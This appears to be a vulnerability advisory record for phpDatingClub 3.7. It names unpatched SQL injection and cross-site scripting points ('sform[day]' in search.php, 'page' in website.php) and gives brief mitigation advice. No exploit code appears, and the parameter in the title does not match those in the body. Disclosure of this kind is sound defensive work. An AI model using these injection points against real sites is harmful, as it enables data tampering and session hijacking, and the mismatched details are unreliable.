Vendor: phpDatingClub
By: ThE g0bL!N
CVSS: 7.5 (HIGH)
Type: SQL/XSS Injection
CWE: 89
Product Name: phpDatingClub
Affected Version From: 3.7
Affected Version To: 3.7
Patch Exists: NO
Related CWE: N/A
CPE: a:phpdatingclub:phpdatingclub:3.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
phpDatingClub v3.7 (ansubdepartments_id) SQL/XSS Injection Vulnerability
An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'sform[day]' in the 'search.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. An attacker can also exploit this vulnerability by sending a malicious XSS payload to the vulnerable parameter 'page' in the 'website.php' script. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected site.
Mitigation:
Input validation should be used to prevent SQL injection attacks. Additionally, the application should encode all output sent to the user's browser to prevent cross-site scripting.